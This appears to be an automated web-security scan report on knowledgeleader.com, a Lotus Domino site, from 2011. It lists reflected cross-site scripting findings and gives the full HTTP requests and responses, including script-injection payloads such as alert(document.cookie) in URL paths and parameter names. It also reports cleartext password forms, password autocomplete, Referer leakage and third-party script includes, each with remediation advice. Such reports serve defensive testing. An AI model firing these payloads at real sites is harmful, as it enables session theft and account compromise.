The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload db817(a)2040e5ca45e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /KnowledgeLeaderd6fb7%22%3E%3Cscript%3Ealert(document.cookie)%3C/db817(a)2040e5ca45e/Registration.nsf/Registration!OpenForm&AccountType=Trial?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000115)%3C/script%3E HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:56:38 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13221
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:21:54 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
</db817(a)2040e5ca45e/Registration.nsf/Registration!OpenForm&AccountType=Trial?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000115)%3C/script%3E&Login">
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeaderd6fb7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e34599a0f/Registration.nsf/Registration!OpenForm&AccountType=Trial

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f824f<script>alert(1)</script>147407ba329 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeaderd6fb7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e34599a0f/Registration.nsf/Registration!OpenFormf824f<script>alert(1)</script>147407ba329&AccountType=Trial?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000115)%3C/script%3E HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:56:40 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13260
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:21:55 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
</script>4e34599a0f/Registration.nsf/Registration!OpenFormf824f<script>alert(1)</script>147407ba329&AccountType=Trial?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000115)%3C/script%3E&Login">
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeaderd6fb7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e34599a0f/Registration.nsf/Registration!OpenForm&AccountType=Trial

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8a399<script>alert(1)</script>9b464c8dee5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeaderd6fb7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e34599a0f/Registration.nsf/Registration!OpenForm&AccountType=Trial?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000115)%3C/script%3E&8a399<script>alert(1)</script>9b464c8dee5=1 HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:56:37 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13263
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:21:53 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
</script>4e34599a0f/Registration.nsf/Registration!OpenForm&AccountType=Trial?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000115)%3C/script%3E&8a399<script>alert(1)</script>9b464c8dee5=1&Login">
...[SNIP]...

1.46. http://www.knowledgeleader.com/names.nsf [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/names.nsf

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbfbd"><script>alert(1)</script>60854b69675 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /names.nsf?cbfbd"><script>alert(1)</script>60854b69675=1 HTTP/1.1
Host: www.knowledgeleader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:54:10 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13067
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:19:25 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/names.nsf?cbfbd"><script>alert(1)</script>60854b69675=1&Login">
...[SNIP]...

2. Cleartext submission of password previous next
There are 3 instances of this issue:

/
/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&header
/KnowledgeLeader/Registration.nsf/Authentication+Details!OpenForm

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

2.1. http://www.knowledgeleader.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!EditDocument&Seq=1

The form contains the following password field:

Password

Request

GET / HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:40:31 GMT
Last-Modified: Thu, 28 Apr 2011 13:40:29 GMT
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 38525
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:05:46 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>KnowledgeLeader - A Resource for Internal Audit and Risk Management Professionals</title><link rel="shortcut icon"
...[SNIP]...
unt page window.location.href ="/KnowledgeLeader/Billing.nsf/My+Account!OpenView&login";}getSite();" onkeypress="enterKey(event);" link="#336699" alink="#996633" vlink="#336699">

<form method="post" action="/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!EditDocument&Seq=1" name="_DominoForm">
<input type="hidden" name="__Click" value="0">
...[SNIP]...
<font size="2">
<input name="Password" value="" type="password" tabindex="2" id="Password"></font>
...[SNIP]...

2.2. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&header previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&header

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!EditDocument&Seq=1&header

The form contains the following password field:

Password

Request

GET /KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&header HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Registration!OpenForm&AccountType=Trial
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:41:55 GMT
Last-Modified: Thu, 28 Apr 2011 13:41:53 GMT
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 38536
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:07:11 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>KnowledgeLeader - A Resource for Internal Audit and Risk Management Professionals</title><link rel="shortcut icon"
...[SNIP]...
unt page window.location.href ="/KnowledgeLeader/Billing.nsf/My+Account!OpenView&login";}getSite();" onkeypress="enterKey(event);" link="#336699" alink="#996633" vlink="#336699">

<form method="post" action="/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!EditDocument&Seq=1&header" name="_DominoForm">
<input type="hidden" name="__Click" value="0">
...[SNIP]...
<font size="2">
<input name="Password" value="" type="password" tabindex="2" id="Password"></font>
...[SNIP]...

2.3. http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Authentication+Details!OpenForm previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Registration.nsf/Authentication+Details!OpenForm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Authentication%20Details!OpenForm&Seq=1

The form contains the following password field:

Password

Request

GET /KnowledgeLeader/Registration.nsf/Authentication+Details!OpenForm HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&Login&header
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:40:51 GMT
Last-Modified: Thu, 28 Apr 2011 13:40:49 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21384
Expires: 0
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:06:07 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<LINK REL="STYLESHEET" type="text/css" href="/KnowledgeLeader/GlobalStyle.css"><title>KnowledgeLeader Registration - Log I
...[SNIP]...
r redirectTo = parent.document[0].RedirectTo.value;document.forms[0].RedirectToValue.value = redirectTo;doBrowserDetect(); doCatchCache(); getCookie(); doSetFocus();" onkeypress="CheckKey(event)">

<form method="post" action="/KnowledgeLeader/Registration.nsf/Authentication%20Details!OpenForm&Seq=1" name="_DominoForm">
<input type="hidden" name="__Click" value="0">
...[SNIP]...
<br>

<input name="Password" value="" type="password" tabindex="2" id="Password" class="RequiredField"></td>
...[SNIP]...

3. Password field with autocomplete enabled previous next
There are 3 instances of this issue:

/
/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&header
/KnowledgeLeader/Registration.nsf/Authentication+Details!OpenForm

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

3.1. http://www.knowledgeleader.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!EditDocument&Seq=1

The form contains the following password field with autocomplete enabled:

Password

Request

Response

3.2. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&header previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&header

Issue detail

The page contains a form with the following action URL:

http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!EditDocument&Seq=1&header

The form contains the following password field with autocomplete enabled:

Password

Request

Response

3.3. http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Authentication+Details!OpenForm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Registration.nsf/Authentication+Details!OpenForm

Issue detail

The page contains a form with the following action URL:

http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Authentication%20Details!OpenForm&Seq=1

The form contains the following password field with autocomplete enabled:

Password

Request

Response

4. Cross-domain Referer leakage previous next
There are 2 instances of this issue:

/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&Login&header
/KnowledgeLeaderd6fb7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e34599a0f/Registration.nsf/Registration!OpenForm&AccountType=Trial

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

4.1. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&Login&header previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&Login&header

Issue detail

The page was loaded from a URL containing a query string:

http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&Login&header?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000EE)%3C/script%3E

The response contains the following links to other domains:

http://s7.addthis.com/js/15/addthis_widget.js
http://s7.addthis.com/static/btn/lg-bookmark-en.gif
http://www.addthis.com/bookmark.php
http://www.facebook.com/group.php?gid=6507701727
http://www.linkedin.com/groups?gid=53088&trk=hb_side_g
http://www.protiviti.com/en-US/Pages/Privacy-Policy.aspx

Request

GET /KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&Login&header?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000EE)%3C/script%3E HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:48:48 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13166
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:14:03 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
</script>
<a href="http://www.addthis.com/bookmark.php" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_to()"><img src="http://s7.addthis.com/static/btn/lg-bookmark-en.gif" width="125" height="16" alt="Bookmark and Share www.KnowledgeLeader.com" style="border:0"/></a>
<script type="text/javascript" src="http://s7.addthis.com/js/15/addthis_widget.js"></script>
...[SNIP]...
</a> | <a href="http://www.protiviti.com/en-US/Pages/Privacy-Policy.aspx" target="_blank">Privacy Policy</a>
...[SNIP]...
<div align="center"><a href="http://www.linkedin.com/groups?gid=53088&trk=hb_side_g" target="_blank"><img src="/icons/KnowledgeLeader/Images/LinkedIn.JPG" width="93" height="33" border="0" style="vertical-align:top" alt="KnowledgeLeader LinkedIn Page"></a>   
<a href="http://www.facebook.com/group.php?gid=6507701727" target="_blank"><img src="/icons/KnowledgeLeader/Images/Facebook.jpg" width=77" height="28" border="0" style="vertical-align:top" alt="KnowledgeLeader Facebook Page">
...[SNIP]...

4.2. http://www.knowledgeleader.com/KnowledgeLeaderd6fb7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e34599a0f/Registration.nsf/Registration!OpenForm&AccountType=Trial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeaderd6fb7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e34599a0f/Registration.nsf/Registration!OpenForm&AccountType=Trial

Issue detail

The page was loaded from a URL containing a query string:

http://www.knowledgeleader.com/KnowledgeLeaderd6fb7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e34599a0f/Registration.nsf/Registration!OpenForm&AccountType=Trial?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000115)%3C/script%3E

The response contains the following links to other domains:

http://s7.addthis.com/js/15/addthis_widget.js
http://s7.addthis.com/static/btn/lg-bookmark-en.gif
http://www.addthis.com/bookmark.php
http://www.facebook.com/group.php?gid=6507701727
http://www.linkedin.com/groups?gid=53088&trk=hb_side_g
http://www.protiviti.com/en-US/Pages/Privacy-Policy.aspx

Request

GET /KnowledgeLeaderd6fb7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e34599a0f/Registration.nsf/Registration!OpenForm&AccountType=Trial?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000115)%3C/script%3E HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:56:34 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13219
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:21:49 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
</script>
<a href="http://www.addthis.com/bookmark.php" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_to()"><img src="http://s7.addthis.com/static/btn/lg-bookmark-en.gif" width="125" height="16" alt="Bookmark and Share www.KnowledgeLeader.com" style="border:0"/></a>
<script type="text/javascript" src="http://s7.addthis.com/js/15/addthis_widget.js"></script>
...[SNIP]...
</a> | <a href="http://www.protiviti.com/en-US/Pages/Privacy-Policy.aspx" target="_blank">Privacy Policy</a>
...[SNIP]...
<div align="center"><a href="http://www.linkedin.com/groups?gid=53088&trk=hb_side_g" target="_blank"><img src="/icons/KnowledgeLeader/Images/LinkedIn.JPG" width="93" height="33" border="0" style="vertical-align:top" alt="KnowledgeLeader LinkedIn Page"></a>   
<a href="http://www.facebook.com/group.php?gid=6507701727" target="_blank"><img src="/icons/KnowledgeLeader/Images/Facebook.jpg" width=77" height="28" border="0" style="vertical-align:top" alt="KnowledgeLeader Facebook Page">
...[SNIP]...

5. Cross-domain script include previous next
There are 13 instances of this issue:

/
/KnowledgeLeader/Content.nsf/Web+Content/AboutKLValueProposition!OpenDocument
/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&Login&header
/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&header
/KnowledgeLeader/Content.nsf/Web+Content/KLplus!OpenDocument
/KnowledgeLeader/Registration.nsf/Authentication+Details!OpenForm
/KnowledgeLeader/Registration.nsf/Forgot%20Password!OpenForm&Seq=1
/KnowledgeLeader/Registration.nsf/Forgot+Password
/KnowledgeLeader/Registration.nsf/Forgot+Password!OpenForm
/KnowledgeLeader/Registration.nsf/Message!OpenForm&DisplayException%20Email%20Not%20FoundGeneric
/KnowledgeLeader/Registration.nsf/Registration
/KnowledgeLeader/Registration.nsf/Registration!OpenForm&AccountType=Trial
/KnowledgeLeaderd6fb7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e34599a0f/Registration.nsf/Registration!OpenForm&AccountType=Trial

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

5.1. http://www.knowledgeleader.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/15/addthis_widget.js

Request

Response

5.2. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/AboutKLValueProposition!OpenDocument previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Content/AboutKLValueProposition!OpenDocument

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/15/addthis_widget.js

Request

GET /KnowledgeLeader/Content.nsf/Web+Content/AboutKLValueProposition!OpenDocument HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&header
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:47:19 GMT
Last-Modified: Thu, 28 Apr 2011 13:47:17 GMT
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 23436
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:34 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>KnowledgeLeader Value Proposition</title><link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico"
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/15/addthis_widget.js"></script>
...[SNIP]...

5.3. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&Login&header previous next

Summary

Severity:	Information
